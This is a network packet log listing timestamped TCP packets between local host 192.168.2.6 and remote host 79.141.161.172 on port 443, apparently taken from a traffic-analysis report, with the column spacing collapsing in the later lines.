Sep 10, 2024 16:33:48.039165020 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.039190054 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.039402962 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.039416075 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.039493084 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.039493084 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.039501905 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.056693077 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.056710005 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.056771040 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.056783915 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.056817055 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.125448942 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.125466108 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.125593901 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.125616074 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.125969887 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.125988007 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.126070023 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.126070023 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.126079082 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.126751900 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.126765966 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.126853943 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.126853943 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.126864910 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.127506971 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.127525091 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.127589941 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.127589941 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.127597094 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.131154060 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.131166935 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.131247044 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.131247044 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.131257057 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.131706953 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.131725073 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.131795883 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.131795883 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.131802082 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.132204056 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.132216930 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.132277966 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.132277966 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.132283926 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.144336939 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.144356966 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.144442081 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.144442081 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.144452095 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.212527037 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.212551117 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.212657928 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.212657928 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.212677956 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.213030100 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.213049889 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.213116884 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.213116884 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.213124990 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.213524103 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.213540077 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.213579893 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.213587999 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.213614941 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.214023113 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.214042902 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.214143991 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.214143991 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.214152098 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.214425087 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.214440107 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.214519024 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.214519024 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.214525938 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.215039968 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.215059042 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.215264082 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.215270996 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.215348005 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.215362072 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.215434074 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.215434074 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.215441942 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.246361017 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.246391058 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.246509075 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.246509075 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.246536016 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.299424887 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.299446106 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.299616098 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.299616098 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.299644947 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.299856901 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.299875975 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.299909115 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.299918890 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.299949884 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.300416946 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.300434113 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.300518990 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.300518990 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.300528049 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.300853014 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.300870895 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.300915003 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.300921917 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.300952911 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.301263094 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.301278114 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.301364899 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.301364899 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.301373005 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.301811934 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.301831007 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.301875114 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.301882029 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.301912069 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.302340984 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.302355051 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.302419901 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.302419901 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.302428007 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.332739115 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.332757950 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.332942963 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.332942963 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.332973003 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.385993958 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.386008978 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.386193037 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.386224985 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.386511087 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.386528015 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.386600018 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.386600018 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.386610031 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.387147903 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.387161970 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.387248993 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.387248993 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.387258053 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.387641907 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.387660027 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.387697935 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.387706041 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.387736082 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.388195038 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.388207912 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.388308048 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.388317108 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.388591051 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.388608932 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.388645887 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.388653994 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.388684034 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.389177084 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.389199018 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.389235973 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.389244080 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.389273882 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.420949936 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.420977116 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.421102047 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.421102047 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.421133995 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.472726107 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.472739935 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.472886086 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.472919941 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.473270893 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.473287106 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.473388910 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.473407030 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.473457098 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.473824024 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.473835945 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.473984957 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.473999977 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.474325895 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.474342108 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.474482059 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.474498034 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.474848032 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.474859953 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.474960089 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.474960089 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.474977970 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.475406885 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.475424051 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.475827932 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.475840092 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.475841045 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.475857973 CEST  443    49733  79.141.161.172  192.168.2.6
                                                                                Sep 10, 2024 16:33:48.475949049 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.475949049 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.508917093 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.508934021 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.509702921 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.509732962 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.511084080 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.559779882 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.559796095 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.559952974 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.560022116 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.560142994 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.560292959 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.560308933 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.560389042 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.560404062 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.560731888 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.560784101 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.560797930 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.561065912 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.561079979 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.561803102 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.562475920 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.562490940 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.562669039 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.562684059 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.562808990 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.562928915 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.562943935 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.563039064 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.563039064 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.563059092 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.563287020 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.563333035 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.563349962 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.563465118 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.563477993 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.563640118 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.563726902 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.563740969 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.563852072 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.563865900 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.564188957 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.595547915 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.595562935 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.596014023 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.596080065 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.596347094 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.646771908 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.646796942 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.647145987 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.647192001 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.647216082 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.647291899 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.647337914 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.647337914 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.647730112 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.647742987 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.648125887 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.648148060 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.648199081 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.648216963 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.648297071 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.648297071 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.648314953 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.649686098 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.649698973 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.649787903 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.649787903 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.649806976 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.650140047 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.650156021 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.650202036 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.650218010 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.650269032 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.650696993 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.650710106 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.651005983 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.651021957 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.682334900 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.682357073 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.682487011 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.682487965 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.682559013 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.733870983 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.733891010 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.734116077 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.734143019 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.735179901 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.735200882 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.735301018 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.735301018 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.735323906 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.735511065 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.735528946 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.735613108 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.735613108 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.735630035 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.736099005 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.736118078 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.736201048 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.736201048 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.736217022 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.737093925 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.737107992 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.737195015 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.737195969 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.737210035 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.738461018 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.738478899 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.738533974 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.738547087 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.738589048 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.738929987 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.738945961 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.739062071 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.739075899 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.772129059 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.772151947 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.772274971 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.772274971 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.772346020 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.822685957 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.822705984 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.822865009 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.822865963 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.822941065 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.822999954 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.823019981 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.823112965 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.823112965 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:48.823132038 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.823743105 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.823757887 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:48.823832035 CEST49733443192.168.2.679.141.161.172
